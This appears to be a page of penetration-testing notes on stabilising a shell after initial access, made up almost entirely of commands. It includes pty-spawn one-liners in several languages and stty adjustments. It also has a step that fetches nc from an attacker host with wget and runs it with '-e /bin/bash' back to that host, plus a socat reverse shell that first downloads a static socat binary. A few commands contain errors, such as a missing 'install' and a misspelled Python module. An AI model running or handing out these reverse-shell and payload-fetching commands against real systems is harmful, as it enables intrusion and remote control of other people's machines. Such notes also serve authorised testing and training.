Shell Balancing
after initial access into machine we need to stable our shell so there are various ways to do this we will be looking over them ..
Example of Bad shell
Upgrade reverse shell to fully usable TTY shell
rlwrap
During reciving connection form target machine we can use
rlwrap
we can also mitigate some of the restrictions of poor netcat shells by wrapping the netcat listener with the
rlwrap
command.This is not installed by default so we need to install it using
sudo apt rlwrap
.
rlwrap nc -lvnp $port
Using env-call and script
This is a generic shell command that receive the default system shell.
SHELL=/bin/bash script -q /dev/null
Using Script
script comes pre-installed
check the man page
-q is for quite , -c is for command
/usr/bin/script -qc /bin/bash /dev/null
ctrl+z
stty raw -echo; fg; reset
Python
Python is great tool for balancing the shell.
# on victum machine
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
# on attacker machine
stty raw -echo
fg
# on victum machine
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
Perl
If python is not installed or perl avilable on box then we can use this .
perl -e 'exec "/bin/sh";' #
Ruby
if ruby is installed on box.
exec "/bin/sh"
ruby -e 'exec "/bin/sh"'
Lua
lua -e "os.execute('/bin/sh')"
Copy over NC and spawn a shell
Using wget and python's SimpleHttpServer NC was easily moved over to the target
here we copy nc to victum machine and then receive the shell.
# Attacker Machine
cp /usr/bin/nc . ; python -m SimpleHttpServer 9998
nc -nlvp 9998
# Victum Machine
cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
./nc 10.x.x.x 9998 -e /bin/bash
Socat
never sue nc while receiving connections ,use socat it will give you more generic shell like ssh.
# Attacker Machine
socat file:`tty`,raw,echo=0 TCP-L:1234
# Victum Machine
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234
# if socat not preasent then we can use the binary
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1234
Last updated